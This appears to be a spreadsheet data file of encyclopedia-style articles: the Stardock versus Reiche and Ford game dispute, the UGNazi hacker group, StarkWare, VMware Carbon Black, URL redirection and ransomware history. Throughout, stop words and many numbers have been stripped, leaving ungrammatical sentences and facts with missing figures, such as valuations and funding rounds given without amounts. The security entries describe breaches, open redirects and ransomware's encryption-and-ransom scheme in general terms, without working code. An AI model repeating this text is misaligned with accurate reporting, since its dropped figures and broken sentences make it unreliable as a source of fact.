sued personally, turned crowdfunding legal costs. ruling stardock's motion preliminary injunction september 2018, stardock filed motion court requesting preliminary injunction preventing reiche ford issuing dmca takedown notice stardock's forthcoming origins game. judge saundra brown armstrong denied stardock's request december 2018, agreeing reiche ford stardock aware intellectual property issues admission, still started work potentially infringing product, calling situation stardock's making. describing claims "frivolous", judge armstrong wrote:defendants [(reiche ford)] object wardell's declaration [that] "stardock incorporated copyrightable artwork star control star control star control origins game itself," ground wardell lacks expertise necessary opine constitutes "copyrightable artwork". indeed, wardell failed establish expertise, opinion whether work question "copyrightable" constitutes improper legal conclusion. such legal conclusions without evidentiary value. plaintiff [(stardock)] knowledge defendants’ copyright claims outset. despite knowledge, developed potentially infringing material without resolution ownership issues, publicized release material pendency action. claims investment origins reputation line. given plaintiff largely created foregoing predicament, court disinclined extricate plaintiff peril making. after ruling, reiche ford issued dmca takedown notice steam gog.com. stardock file counter-notice, games subsequently removed sale beginning 2019. reiche ford defended dmca takedown requests pointing substantial similarities origins star control evidence intentional copying, violation copyright. later month, steam gog.com restored origins sale. when stardock owner brad wardell mentioned digital stores reviewed reconsidered takedown, polygon revealed correspondence stardock offered accept potential copyright liability secure stores consequences litigation. final settlement june 2019, parties successfully negotiated legal settlement. they agreed stardock star control trademark, reiche ford ur-quan masters trademark, perpetual trademark license ur-quan masters community open source project. stardock also agreed avoid using plots, characters, locations would infringe reiche ford's copyrights, parties committing discuss disputes. part this, stardock dropped trademark claims alien names first games. reiche ford also agreed remain quiet ghosts precursors years, game would renamed part agreement. unusual agreements settlement stardock's owner brad wardell would provide paul reiche honey hives, return reiche provide wardell mead. also copyright protection fictional characters anderson stallone comics mark towle nichols universal pictures corp. suntrust bank houghton mifflin references external links order judge saundra brown armstrong denying motion preliminary injunction legal filings parties</t>
  </si>
  <si>
    <t>UGNazi</t>
  </si>
  <si>
    <t>ugnazi (underground nazi hacktivist group) hacker group. group conducted series cyberattacks, including social engineering, data breach, denial-of-service attacks, websites various organizations 2012. members ugnazi arrested june 2012; incarcerated. december 2018, members ugnazi arrested connection murder manila. attacks january 2012, ugnazi defaced website ultimate fighting championship response ufc's support stop online piracy act. april 2012, ugnazi performed distributed denial-of-service attacks websites central intelligence agency department justice protest cyber intelligence sharing protection act.in 2012, compromising database belonging washington military department, ugnazi leaked sensitive information used state washington. they also leaked account details users, consisting usernames password hashes, including website's administrator. ugnazi performed social engineering attack host billing software developer whmcs. member group called whmcs' hosting provider, impersonating senior employee. they gained root access whmcs's server leaked whmcs's database, website files, cpanel configuration. leaked database contained 500,000 stored credit card numbers.on june 2012, ugnazi targeted 4chan hijacking attack vulnerability cloudflare's google's two-factor authentication system, redirecting visitors ugnazi's twitter account. ugnazi attacked non-profit organization wounded warrior project released project's database june 2012. june 2012, ugnazi hacked website wawa defaced webpage. june 2012, ugnazi claimed took popular social media website twitter hours denial service attack. biddle gizmodo disputed veracity claim.ugnazi hacked twitter accounts shirley phelps-roper december 2012, fred phelps december 2012, opposition westboro baptist church's planned protest following sandy hook elementary school shootings.in january 2021, parler john matze alleged news ugnazi actively working facilitate targeted harassment family following temporary take-down parler, far-right social network implicated 2021 storming united states capitol. arrests sentencing islam ("josh god") eric taylor ("cosmo god") ugnazi arrested june 2012 result operation card shop, federal bureau investigation investigation identity theft credit card fraud. islam apprehended manhattan attempted withdraw money using stolen card. november 2012, taylor sentenced juvenile court long beach, california. taylor pleaded guilty multiple felonies, including credit card fraud, identity theft, bomb threats, online impersonation, exchange probation. terms plea placed probation 21st birthday, restricted internet access, required forfeit seized assets.on december 2018, troy woody ("osama god") islam ("josh god") ugnazi arrested manila murder charges related death tomi masters, woody's girlfriend. woody islam dumped containing masters's body pasig river. both members ugnazi confirmed handled box, individually denied killing masters. woody islam pleaded guilty charges february 2019, trial scheduled march references external links official website</t>
  </si>
  <si>
    <t>StarkWare Industries</t>
  </si>
  <si>
    <t>starkware industries israeli software company cryptography field. develops zero-knowledge proof technology compresses information order address scalability problem blockchain, works ethereum platform. 2022 company's estimated value billion, increase billion months earlier. history starkware industries founded 2018 ben-sasson (president) technion, founders zcash, former phd. student michael riabzev, kolodny (ceo) alessandro chiesa berkeley (chief scientist). april 2019 technion sued ben-sasson riabazev violating intellectual property institute claimed ben-sasson established starkware clandestinely, academic research without consent demand stake company. ben-sasson claimed didn’t used invention belonging technion, merely based starkwares’ employees knowledge. 2020 sides reached agreement ben-sasson left technion.starkware raised million seed money afterwards million series round paradigm, fund fred ehrsam. other participants intel capital, sequoia capital, coinbase vitalik buterin. march 2021 company raised million series round. paradigm, along vc’s sequoia, dcvc, pantera capital, wing, alameda research, founders fund. addition received million ethereum foundation. november 2021 starkware raised million series round sequoia, making total raised money $163 million bringing value billion, making unicorn. 2022 starkware raised million series round greenoaks capital coatue management, bringing value billion. series carried despite bear market.starkware’s scientific advisors include: wigderson, shafi goldwasser, noam nisan madhu sudan. company’s advisors include: balaji srinivasan, joseph lubin, naval ravikant, glocer. company employs people located netanya. technology starkware develops technology called stark (scalable transparent argument knowledge) improve scalability blockchain founded basis theoretical research conducted ben-sasson riabzev others technion addition mathematical models zero knowledge proofs (zkp). company develops technology based math batch thousands transactions single batch, away basis layer ethereum. each final update batch written ethereum using file kilobytes, acts proof content batch. this compression process increases amount data accepted block blockchain minimizes energy needed transaction. energy consumption transaction reduces 200,000 times.starkware first offered technology form starkex, proprietary scaling engine launched ethereum june 2020. used sorare, dydx, immutable browser opera, deversifi. june 2021 starkware launched second platform: starknet. unlike starkex, available clients, starknet permissionless. developer build scalable decentralized applications. 2022 100,000 downloads developer tools build starknet. starkware’s systems programmed cairo language, turing complete programming language built researchers engineers company. starkware’s systems programmed cairo language, turing complete programming language built researchers engineers company. also list unicorn startup companies science technology israel silicon wadi references</t>
  </si>
  <si>
    <t>VMware Carbon Black</t>
  </si>
  <si>
    <t>vmware carbon black (formerly bit9, bit9 carbon black, carbon black) cybersecurity company based waltham, massachusetts. company develops cloud-native endpoint security software designed detect malicious behavior help prevent malicious files attacking organization. company leverages technology known predictive security cloud (psc), data analytics cloud platform analyzes customers’ unfiltered data threats.the company approximately partners. 5,600 customers including approximately one-third fortune 100.in october 2019, company acquired vmware. history carbon black founded bit9 2002 todd brennan, allen hillery, john hanratty. company's first george kassabgi. current ceo, patrick morley, formerly chief operating officer corel. took position 2007.in 2013, company's network broken malicious actors copied private signing certificate used sign malware.in february 2014, bit9 acquired start-up security firm carbon black. time acquisition, company also raised $38.25 million series funding, bringing bit9’s total venture capital raised approximately $120 million. company acquired objective logistics june 2015. august 2015, company announced acquired data analytics firm visitrend would open technology development center downtown boston. month later, company announced would partner secureworks, ernst young, kroll, trustwave, rapid7 provide managed security incident response services.the company changed name carbon black february 2016, known "bit9 carbon black" approximately years.in july 2016, carbon black announced acquired next-generation antivirus software provider confer undisclosed sum. prior deal, confer raised million venture funding employees. according wall street journal, deal valued $100 million.on 2018, company joined public markets, listing "cblk" nasdaq exchange. part initial public offering (ipo), carbon black raised approximately $152 million valuation $1.25 billion. prior ipo, firm raised $190m investors including kleiner perkins, highland capital, sequoia, accomplice, blackstone.in october 2019, company acquired vmware. references external links official website</t>
  </si>
  <si>
    <t>URL redirection</t>
  </si>
  <si>
    <t>redirection, also called forwarding, world wide technique making page available address. when browser attempts open redirected, page different opened. similarly, domain redirection domain forwarding pages domain redirected different domain, wikipedia.com wikipedia.net automatically redirected wikipedia.org. redirection done various reasons: shortening; prevent broken links pages moved; allow multiple domain names belonging owner refer single site; guide navigation website; privacy protection; hostile purposes phishing attacks malware distribution. purposes there several reasons redirection: forcing https website potentially accessible secure https scheme plain http insecure beginning "http://"). user types clicks link refers insecure variant, browser automatically redirect secure version case website contained hsts preload list shipped application user already visited origin past. otherwise website contacted http. website operator decide serve requests redirecting browser https variant instead hopefully also priming hsts future accesses. similar domain names user might mistype url. organizations often register "misspelled" domains redirect "correct" location. this technique often used "reserve" top-level domains (tld) name, make easier ".edu" ".net" site accommodate users type ".com". moving pages domain pages redirected domain three reasons: site might desire, need, change domain name; author might move individual pages domain; sites might merge.with redirects, incoming links outdated sent correct location. these links might sites realized change bookmarks/favorites users saved browsers. applies search engines. they often older/outdated domain names links database send search users urls. using "moved permanently" redirect url, visitors still correct page. also, next search engine pass, search engine detect newer url. logging outgoing links access logs servers keep detailed information visitors came browsed hosted site. they not, however, links visitors left this visitor's browser need communicate original server visitor clicks outgoing link. this information captured several ways. involves redirection. instead sending visitor straight site, links site direct original website's domain automatically redirects real target. this technique bears downside delay caused additional request original website's server. added request leave trace server log, revealing exactly link followed, also privacy issue. technique also used corporate websites implement statement subsequent content another site, therefore necessarily affiliated corporation. scenarios, displaying warning causes additional delay. short aliases long urls applications often include lengthy descriptive attributes urls represent data hierarchies, command structures, transaction paths session information. this practice results aesthetically unpleasant difficult remember, within size limitations microblogging sites. shortening services provide solution problem redirecting user longer shorter one. meaningful, persistent aliases long changing urls sometimes page changes even though content stays same. therefore, redirection help users bookmarks. this routinely done wikipedia whenever page renamed. post/redirect/get post/redirect/get (prg) development design pattern prevents duplicate form submissions user clicks refresh button submitting form, creating intuitive interface user agents (users). device targeting geotargeting redirects effectively used targeting purposes like geotargeting. device targeting become increasingly important rise mobile clients. there approaches serve mobile users: make website responsive redirect mobile website version. mobile website version offered, users mobile clients automatically forwarded corresponding mobile content. device targeting, client-side redirects non-cacheable server-side redirects used. geotargeting approach offer localized content automatically forward user localized version requested url. this helpful websites target audience location and/or language. usually server-side redirects used geotargeting client-side redirects might option well, depending requirements. manipulating search engines redirects used manipulate search engines unethical intentions, e.g., hijacking. goal misleading redirects drive search traffic landing pages, enough ranking power remotely related search target. approach requires rank range search terms number urls would utilize sneaky redirects forward searcher target page. this method revival uprise mobile devices device targeting. hijacking off-domain redirect technique exploited nature search engine's handling temporary redirects. temporary redirect encountered, search engines decide whether assign ranking value initializes redirect redirect target url. initiates redirect kept show search results, redirect indicates temporary nature. under certain circumstances possible exploit behavior applying temporary redirects well-ranking urls, leading replacement original search results initialized redirect, therefore "stealing" ranking. this method usually combined sneaky redirects re-target user stream search results target page. search engines developed efficient technologies detect kinds manipulative approaches. major search engines usually apply harsh ranking penalties sites caught applying techniques like these. manipulating visitors redirection sometimes used part phishing attacks confuse visitors site visiting. because modern browsers always show real address bar, threat lessened. however, redirects also take sites otherwise attempt attack ways. example, redirect might take user site would attempt trick downloading antivirus software installing trojan sort instead. removing referrer information when link clicked, browser sends along http request field called referer indicates source link. this field populated current page, logs server serving external link. since sensitive pages sensitive urls (for example, https://company.com/plans-for-the-next-release-of-our-product), desirable referrer leave organization. redirection page performs referrer hiding could embedded external urls, transforming example https://externalsite.com/page https://redirect.company.com/https://externalsite.com/page. this technique also eliminates potentially sensitive information referrer url, session reduce chance phishing indicating user passed clear gateway another site. implementation several different kinds response browser result redirection. these vary whether affect http headers html content. techniques used typically depend role person implementing access different parts system. example, author control headers might refresh meta whereas server administrator redirecting pages site likely server configuration. manual redirect simplest technique visitor follow link page, usually using html anchor like: this method often used fall-back browser support automatic redirect, visitor still reach target document following link. http status codes http protocol used world wide web, redirect response status code beginning causes browser display different page. client encounters redirect, needs make number decisions handle redirect. different status codes used clients understand purpose redirect, handle caching request method subsequent request. http/1.1 defines several status codes redirection (rfc 7231): multiple choices (e.g. offer different languages) moved permanently (redirects permanently another passing link equity redirected page) found (originally "temporary redirect" http/1.0 popularly used scripts; superseded http/1.1 preserved backward compatibility) (forces request even original request post) proxy (indicates client's requested resource available proxy) temporary redirect (provides browser resubmit post request) permanent redirect (provides browser resubmit post request)status codes modified proxy redirects. status codes require redirect target given location: header http response. multiple choices usually list choices body message show default choice location: header. example http response redirect http response "moved permanently" redirect looks like this: using server-side scripting redirection authors producing html content can't usually create redirects using http headers generated automatically server program serving html file. usually true even programmers writing scripts, though servers allow scripts custom headers (e.g. enabling "non-parsed-headers"). many servers generate status code script outputs "location:" header line. example, php, "header" function: more headers required prevent caching. programmer must ensure headers output body. this easily natural flow control code. help this, frameworks server-side content generation buffer body data. scripting language, also accomplished using response.buffer=true response.redirect "https://www.example.com/" http/1.1 allows either relative reference absolute reference. reference relative client computes required absolute reference according rules defined 3986. apache http server mod_rewrite apache http server mod_alias extension used redirect certain requests. typical configuration directives look like: flexible rewriting redirection, apache mod_rewrite used. e.g., redirect requests canonical domain name: such configuration applied sites server server configuration files single content directory .htaccess file. nginx rewrite nginx integrated http rewrite module, used perform advanced processing even web-page generation (with return directive). showing example advanced rewrite module mdoc.su archived april 2022 wayback machine, implements deterministic shortening service entirely help nginx configuration language alone.for example, request /dragonflybsd/hammer.5 come along, would first redirected internally /d/hammer.5 first rewrite directive (only affecting internal state, without http replies issued client yet), second rewrite directive, http response found status code would issued client actually redirect external script web-man: refresh meta http refresh header netscape introduced meta refresh feature refreshes page certain amount time. this specify replace page another. this supported browsers. timeout zero seconds effects immediate redirect. this treated like permanent redirect google, allowing transfer pagerank target page.this example simple html document uses technique: this technique used authors meta contained inside document itself. meta must placed "head" section html file. number example replaced another number achieve delay many seconds. anchor "body" section users whose browsers support feature. effect achieved http refresh header: this response easier generate programs need change default status code. here simple program effects redirect: note: usually, http server adds status line content-length header automatically. discourage meta refresh, since communicate information either original resource, browser search engine). w3c's content accessibility guidelines (7.4) discourage creation auto-refreshing pages, since browsers allow user disable control refresh rate. some articles written issue include content accessibility guidelines (1.0): ensure user control time-sensitive content changes, standard redirects: break back button! core techniques content accessibility guidelines section javascript redirects javascript cause redirect setting window.location attribute, e.g.: normally javascript pushes redirector site's browser's history. cause redirect loops users back button. with following command prevent type behaviour. however, http headers refresh meta preferred security reasons javascript executed browsers many crawlers. frame redirects slightly different effect achieved creating inline frame: main difference redirect methods frame redirect, browser displays frame document target page bar. this cloaking technique used reader sees memorable fraudulently conceal phishing site part website spoofing.before html5, effect could done html frame contains target page: redirect chains redirect lead another. example, "https://wikipedia.com" (with "*.com" domain) first redirected https://www.wikipedia.org/ (with domain name .org), navigate language-specific site. this unavoidable different links chain served different servers though minimised rewriting much possible server returning browser redirect. redirect loops sometimes mistake cause page redirecting back itself, possibly pages, leading infinite sequence redirects. browsers stop redirecting certain number hops display error message. http/1.1 standard states: client should detect intervene cyclical redirections (i.e., "infinite" redirection loops). note: earlier version specification recommended maximum five redirections ([rfc 2068], section 10.3). content developers need aware clients might implement fixed limitation. note urls sequence might repeat, e.g.: https://www.example.com/1 http://www.example.com/2 http://www.example.com/3 services there exist services perform redirection demand, need technical work access server site hosted redirection services redirect service information management system, provides internet link redirects users desired content. typical benefit user memorable domain name, reduction length address. redirecting link also used permanent address content frequently changes hosts, similarly domain name system. hyperlinks involving redirection services frequently used spam messages directed blogs wikis. thus, reduce spam reject edits comments containing hyperlinks known redirection services; however, also remove legitimate edits comments effective method reduce spam. recently, redirection services taken using ajax efficient, user friendly method creating shortened urls. major drawback redirection services delay pages, frame based advertising, generate revenue. history first redirect services took advantage top-level domains (tld) ".to" (tonga), ".at" (austria) ".is" (iceland). their goal make memorable urls. first mainstream redirect service v3.com boasted million users peak 2000. v3.com success attributed wide variety short memorable domains including "r.im", "go.to", "i.am", "come.to" "start.at". v3.com acquired fortunecity.com, large free hosting company, early 1999. sales price level domains started falling $50.00 year less $10.00, redirection services declined. with launch tinyurl 2002 kind redirecting service born, namely shortening. their goal make long urls short, able post internet forums. since 2006, character limit extremely popular twitter service, short services heavily used. referrer masking redirection services hide referrer placing intermediate page page link destination. although conceptually similar redirection services, serve different purpose, rarely attempt shorten obfuscate destination intended side-effect hide referrer information provide clear gateway websites.) this type redirection often used prevent potentially-malicious links gaining information using referrer, example session query string. many large community websites link redirection external links lessen chance exploit could used steal account information, well make clear user leaving service, lessen chance effective phishing here simplistic example service, written php. example check called (e.g. referrer, although could spoofed). also, check provided. this means malicious person could link redirection page using parameter his/her selection, page, uses server's resources. security issues redirection abused attackers phishing attacks, open redirect covert redirect. open redirect application takes parameter redirects user parameter value without validation." "covert redirect application takes parameter redirects user parameter value without sufficient validation." disclosed 2014 mathematical doctoral student wang jing nanyang technological university, singapore. also http location canonical link element canonical meta domain masking link semantic normalization references external links mapping urls filesystem locations apache http server version taxonomy javascript redirection spam (microsoft live labs) security vulnerabilities redirectors application security consortium threat classification</t>
  </si>
  <si>
    <t>Ransomware</t>
  </si>
  <si>
    <t>ransomware type malware cryptovirology threatens publish victim's personal data permanently block access unless ransom paid. while simple ransomware lock system without damaging files, advanced malware uses technique called cryptoviral extortion. encrypts victim's files, making inaccessible, demands ransom payment decrypt them. properly implemented cryptoviral extortion attack, recovering files without decryption intractable problem difficult trace digital currencies paysafecard bitcoin cryptocurrencies used ransoms, making tracing prosecuting perpetrators difficult. ransomware attacks typically carried using trojan disguised legitimate file user tricked downloading opening arrives email attachment. however, high-profile example, wannacry worm, traveled automatically computers without user interaction.starting early 1989 first documented ransomware known aids trojan, ransomware scams grown internationally. there 181.5 million ransomware attacks first months 2018. this record marks 229% increase time frame 2017. june 2014, vendor mcafee released data showing collected double number ransomware samples quarter quarter previous year. cryptolocker particularly successful, procuring estimated us$3 million taken authorities, cryptowall estimated federal bureau investigation (fbi) accrued us$18 million june 2015. 2020, received 2,474 complaints identified ransomware adjusted losses $29.1 million. losses could that, according fbi. according report sonicwall, around million ransomware attacks 2021. operation concept file-encrypting ransomware invented implemented young yung columbia university presented 1996 ieee security privacy conference. called cryptoviral extortion inspired fictional facehugger movie alien. cryptoviral extortion following three-round protocol carried attacker victim. [attacker→victim] attacker generates pair places corresponding public malware. malware released. [victim→attacker] carry cryptoviral extortion attack, malware generates random symmetric encrypts victim's data uses public malware encrypt symmetric key. this known hybrid encryption results small asymmetric ciphertext well symmetric ciphertext victim's data. zeroizes symmetric original plaintext data prevent recovery. puts message user includes asymmetric ciphertext ransom. victim sends asymmetric ciphertext e-money attacker. [attacker→victim] attacker receives payment, deciphers asymmetric ciphertext attacker's private key, sends symmetric victim. victim deciphers encrypted data needed symmetric thereby completing cryptovirology attack.the symmetric randomly generated assist victims. point attacker's private exposed victims victim need send small ciphertext (the encrypted symmetric-cipher key) attacker. ransomware attacks typically carried using trojan, entering system through, example, malicious attachment, embedded link phishing email, vulnerability network service. program runs payload, locks system fashion, claims lock system (e.g., scareware program). payloads display fake warning purportedly entity enforcement agency, falsely claiming system used illegal activities, contains content pornography "pirated" media.some payloads consist simply application designed lock restrict system payment made, typically setting windows shell itself, even modifying master boot record and/or partition table prevent operating system booting repaired. sophisticated payloads encrypt files, many using strong encryption encrypt victim's files malware author needed decryption key.payment virtually always goal, victim coerced paying ransomware removed either supplying program decrypt files, sending unlock code undoes payload's changes. while attacker simply take money without returning victim's files, attacker's best interest perform decryption agreed, since victims stop sending payments becomes known serve purpose. element making ransomware work attacker convenient payment system hard trace. range payment methods used, including wire transfers, premium-rate text messages, pre-paid voucher services paysafecard, bitcoin cryptocurrency.in 2020, vendor sophos reported global average cost remediate ransomware attack (considering downtime, people time, device cost, network cost, lost opportunity ransom paid) $761,106. ninety-five percent organizations paid ransom data restored. history encrypting ransomware first known malware extortion attack, "aids trojan" written joseph popp 1989, design failure severe necessary extortionist all. payload files hard drive encrypted names, displayed message claiming user's license certain piece software expired. user asked us$189 cyborg corporation" order obtain repair tool even though decryption could extracted code trojan. trojan also known cyborg". popp declared mentally unfit stand trial actions, promised donate profits malware fund aids research.the idea abusing anonymous cash systems safely collect ransom human kidnapping introduced 1992 sebastiaan solms david naccache. this electronic money collection method also proposed cryptoviral extortion attacks. solms-naccache scenario newspaper publication used (since bitcoin ledgers exist time paper written). notion using public cryptography data kidnapping attacks introduced 1996 adam young moti yung. young yung critiqued failed aids information trojan relied symmetric cryptography alone, fatal flaw decryption could extracted trojan, implemented experimental proof-of-concept cryptovirus macintosh se/30 used tiny encryption algorithm (tea) hybrid encrypt victim's data. since public cryptography used, virus contains encryption key. attacker keeps corresponding private decryption private. young yung's original experimental cryptovirus victim send asymmetric ciphertext attacker deciphers returns symmetric decryption contains victim fee. long electronic money existed young yung proposed electronic money could extorted encryption well, stating "the virus writer effectively hold money ransom half given him. even e-money previously encrypted user, user gets encrypted cryptovirus". they referred attacks "cryptoviral extortion", overt attack part larger class attacks field called cryptovirology, encompasses overt covert attacks. cryptoviral extortion protocol inspired parasitic relationship giger's facehugger host movie alien.examples extortionate ransomware became prominent 2005. mid-2006, trojans gpcode, troj.ransom.a, archiveus, krotten, cryzip, mayarchive began utilizing sophisticated encryption schemes, ever-increasing key-sizes. gpcode.ag, detected june 2006, encrypted 660-bit public key. june 2008, variant known gpcode.ak detected. using 1024-bit key, believed large enough computationally infeasible break without concerted distributed effort.encrypting ransomware returned prominence late 2013 propagation cryptolocker—using bitcoin digital currency platform collect ransom money. december 2013, zdnet estimated based bitcoin transaction information october december, operators cryptolocker procured us$27 million infected users. cryptolocker technique widely copied months following, including cryptolocker (thought related cryptolocker), cryptodefense (which initially contained major design flaw stored private infected system user-retrievable location, windows' built-in encryption apis), august 2014 discovery trojan specifically targeting network-attached storage devices produced synology. january 2015, reported ransomware-styled attacks occurred individual websites hacking, ransomware designed target linux-based servers.in infections, two-stage payload, common many malware systems. user tricked running script, downloads main virus executes early versions dual-payload system, script contained microsoft office document attached vbscript macro, windows scripting facility (wsf) file. detection systems started blocking first stage payloads, microsoft malware protection center identified trend away toward files self-contained microsoft windows powershell scripts. 2016, powershell found involved nearly endpoint security incidents,some ransomware strains used proxies tied hidden services connect command control servers, increasing difficulty tracing exact location criminals. furthermore, dark vendors increasingly started offer technology service, wherein ransomware sold, ready deployment victims' machines, subscription basis, similarly adobe creative cloud office 365.symantec classified ransomware dangerous cyber threat.on september 2020, computer systems biggest healthcare provider universal health services, ransomware attack. chain different locations reported noticing problems, locations reporting locked computers phone systems early sunday september). non-encrypting ransomware august 2010, russian authorities arrested nine individuals connected ransomware trojan known winlock. unlike previous gpcode trojan, winlock encryption. instead, winlock trivially restricted access system displaying pornographic images asked users send premium-rate (costing around us$10) receive code could used unlock machines. scam numerous users across russia neighbouring countries—reportedly earning group us$16 million.in 2011, ransomware trojan surfaced imitated windows product activation notice, informed users system's windows installation re-activated "[being victim fraud". online activation option offered (like actual windows activation process), unavailable, requiring user call international numbers input 6-digit code. while malware claimed call would free, routed rogue operator country high international phone rates, placed call hold, causing user incur large international long-distance charges.in february 2013, ransomware trojan based stamp.ek exploit surfaced; malware distributed sites hosted project hosting services sourceforge github claimed offer "fake nude pics" celebrities. july 2013, x-specific ransomware trojan surfaced, displays page accuses user downloading pornography. unlike windows-based counterparts, block entire computer, simply exploits behaviour browser frustrate attempts close page normal means.in july 2013, 21-year-old virginia, whose computer coincidentally contain pornographic photographs underage girls conducted sexualized communications, turned police receiving deceived moneypak ransomware accusing possessing child pornography. investigation discovered incriminating files, charged child sexual abuse possession child pornography. exfiltration (leakware doxware) converse ransomware cryptovirology attack invented adam young threatens publish stolen information victim's computer system rather deny victim access leakware attack, malware exfiltrates sensitive host data either attacker alternatively, remote instances malware, attacker threatens publish victim's data unless ransom paid. attack presented west point 2003 summarized book malicious cryptography follows, "the attack differs extortion attack following way. extortion attack, victim denied access valuable information back, attack presented victim retains access information disclosure discretion computer virus". attack rooted game theory originally dubbed "non-zero games survivable malware". attack yield monetary gain cases malware acquires access information damage victim user organization, e.g., reputational damage could result publishing proof attack success. common targets exfiltration include: third party information stored primary victim (such customer account information health records); information proprietary victim (such trade secrets product information) embarrassing information (such victim's health information information victim's personal past)exfiltration attacks usually targeted, curated victim list, often preliminary surveillance victim's systems find potential data targets weaknesses. mobile ransomware with increased popularity ransomware platforms, ransomware targeting mobile operating systems also proliferated. typically, mobile ransomware payloads blockers, little incentive encrypt data since easily restored online synchronization. mobile ransomware typically targets android platform, allows applications installed third-party sources. payload typically distributed file installed unsuspecting user; attempt display blocking message applications, another used form clickjacking cause user give "device administrator" privileges achieve deeper access system.different tactics used devices, exploiting icloud accounts using find iphone system lock access device. 10.3, apple patched handling javascript pop-up windows safari exploited ransomware websites. recently shown ransomware also target architectures like found various internet-of-things (iot) devices, industrial edge devices.in august 2019 researchers demonstrated possible infect dslr cameras ransomware. digital cameras often picture transfer protocol (ptp standard protocol used transfer files.) researchers found possible exploit vulnerabilities protocol infect target camera(s) ransomware execute arbitrary code). this attack presented defcon security conference vegas proof concept attack (not actual armed malware). notable attack targets notable software packages reveton 2012, major ransomware trojan known reveton began spread. based citadel trojan (which, itself, based zeus trojan), payload displays warning purportedly enforcement agency claiming computer used illegal activities, downloading unlicensed software child pornography. behaviour, commonly referred "police trojan". warning informs user unlock system, would fine using voucher anonymous prepaid cash service ukash paysafecard. increase illusion computer tracked enforcement, screen also displays computer's address, versions display footage victim's webcam give illusion user recorded.reveton initially began spreading various european countries early 2012. variants localized templates branded logos different enforcement organizations based user's country; example, variants used united kingdom contained branding organizations metropolitan police service police national e-crime unit. another version contained logo royalty collection society music, specifically accused user illegally downloading music. statement warning public malware, metropolitan police clarified would never lock computer part investigation.in 2012, trend micro threat researchers discovered templates variations united states canada, suggesting authors planning target users north america. august 2012, variant reveton began spread united states, claiming require payment $200 fine using moneypak card. february 2013, russian citizen arrested dubai spanish authorities connection crime ring using reveton; individuals arrested money laundering charges. august 2014, avast software reported found variants reveton also distribute password-stealing malware part payload. cryptolocker encrypting ransomware reappeared september 2013 trojan known cryptolocker, generated 2048-bit pair uploaded turn command-and-control server, used encrypt files using whitelist specific file extensions. malware threatened delete private payment bitcoin pre-paid cash voucher made within days infection. extremely large size uses, analysts affected trojan considered cryptolocker extremely difficult repair. even deadline passed, private could still obtained using online tool, price would increase btc—which cost approximately us$2300 november 2013.cryptolocker isolated seizure gameover zeus botnet part operation tovar, officially announced u.s. department justice june 2014. department justice also publicly issued indictment russian hacker evgeniy bogachev alleged involvement botnet. estimated least us$3 million extorted malware shutdown. cryptolocker.f torrentlocker september 2014, wave ransomware trojans surfaced first targeted users australia, names cryptowall cryptolocker (which cryptolocker 2.0, unrelated original cryptolocker). trojans spread fraudulent e-mails claiming failed parcel delivery notices australia post; evade detection automatic e-mail scanners follow links page scan malware, variant designed require users visit page enter captcha code payload actually downloaded, preventing automated processes able scan payload. symantec determined variants, identified cryptolocker.f, again, unrelated original cryptolocker differences operation. notable victim trojans australian broadcasting corporation; live programming television news channel news disrupted half hour shifted melbourne studios cryptowall infection computers sydney studio.another trojan wave, torrentlocker, initially contained design flaw comparable cryptodefense; used keystream every infected computer, making encryption trivial overcome. however, flaw later fixed. late-november 2014, estimated 9,000 users infected torrentlocker australia alone, trailing turkey 11,700 infections. cryptowall another major ransomware trojan targeting windows, cryptowall, first appeared 2014. strain cryptowall distributed part malvertising campaign zedo network late-september 2014 targeted several major websites; redirected rogue websites used browser plugin exploits download payload. barracuda networks researcher also noted payload signed digital signature effort appear trustworthy security software. cryptowall used payload written javascript part email attachment, downloads executables disguised images. evade detection, malware creates instances explorer.exe svchost.exe communicate servers. when encrypting files, malware also deletes volume shadow copies installs spyware steals passwords bitcoin wallets.the reported june 2015 nearly 1,000 victims contacted bureau's internet crime complaint center report cryptowall infections, estimated losses least million.the recent version, cryptowall 4.0, enhanced code avoid antivirus detection, encrypts data files also file names. fusob fusob major mobile ransomware families. between april 2015 march 2016, percent accounted mobile ransomware fusob.like typical mobile ransomware, employs scare tactics extort people ransom. program pretends accusatory authority, demanding victim fine $100 $200 otherwise face fictitious charge. rather surprisingly, fusob suggests using itunes gift cards payment. also, timer clicking screen adds users’ anxiety well. order infect devices, fusob masquerades pornographic video player. thus, victims, thinking harmless, unwittingly download fusob.when fusob installed, first checks language used device. uses russian certain eastern european languages, fusob nothing. otherwise, proceeds lock device demand ransom. among victims, germany united kingdom united states following 14.5% 11.4% respectively. fusob lots common small, another major family mobile ransomware. they represented mobile ransomware 2015 2016. wannacry 2017, wannacry ransomware attack spread internet, using exploit vector named eternalblue, allegedly leaked u.s. national security agency. ransomware attack, unprecedented scale, infected 230,000 computers countries, using different languages demand money users using bitcoin cryptocurrency. wannacry demanded us$300 computer. attack affected telefónica several large companies spain, well parts british national health service (nhs), least hospitals turn away patients cancel scheduled operations, fedex, deutsche bahn, honda, renault, well russian interior ministry russian telecom megafon. attackers gave victims 7-day deadline computers infected, encrypted files would deleted. petya petya first discovered march 2016; unlike forms encrypting ransomware, malware aimed infect master boot record, installing payload encrypts file tables ntfs file system next time infected system boots, blocking system booting windows ransom paid. check point reported despite believed innovative evolution ransomware design, resulted relatively-fewer infections ransomware active around time frame.on june 2017, heavily modified version petya used global cyberattack primarily targeting ukraine (but affecting many countries). this version modified propagate using eternalblue exploit used wannacry. another design change, also unable actually unlock system ransom paid; security analysts speculating attack meant generate illicit profit, simply cause disruption. rabbit october 2017, users russia ukraine reported ransomware attack, named "bad rabbit", follows similar pattern wannacry petya encrypting user's file tables demands bitcoin payment decrypt them. eset believed ransomware distributed bogus update adobe flash software. among agencies affected ransomware were: interfax, odesa international airport, kyiv metro, ministry infrastructure ukraine. used corporate network structures spread, ransomware also discovered countries, including turkey, germany, poland, japan, south korea, united states. experts believed ransomware attack tied petya attack ukraine (especially rabbit's code many overlapping analogical elements code petya/notpetya, appending crowdstrike rabbit notpetya's (dynamic link library) share percent code) though identity culprits names characters game thrones series embedded within code.security experts found ransomware eternalblue exploit spread, simple method inoculate unaffected machine running older windows versions found october 2017. further, sites used spread bogus flash updating gone offline removed problematic files within days discovery, effectively killing spread rabbit. samsam 2016, strain ransomware emerged targeting jboss servers. this strain, named "samsam", found bypass process phishing illicit downloads favor exploiting vulnerabilities weak servers. malware uses remote desktop protocol brute-force attack guess weak passwords broken. virus behind attacks government healthcare targets, notable hacks occurring town farmington, mexico, colorado department transportation, davidson county, north carolina, recently, ransomware attack infrastructure atlanta.mohammad mehdi shah mansouri (born qom, iran 1991) faramarz shahi savandi (born shiraz, iran, 1984) wanted 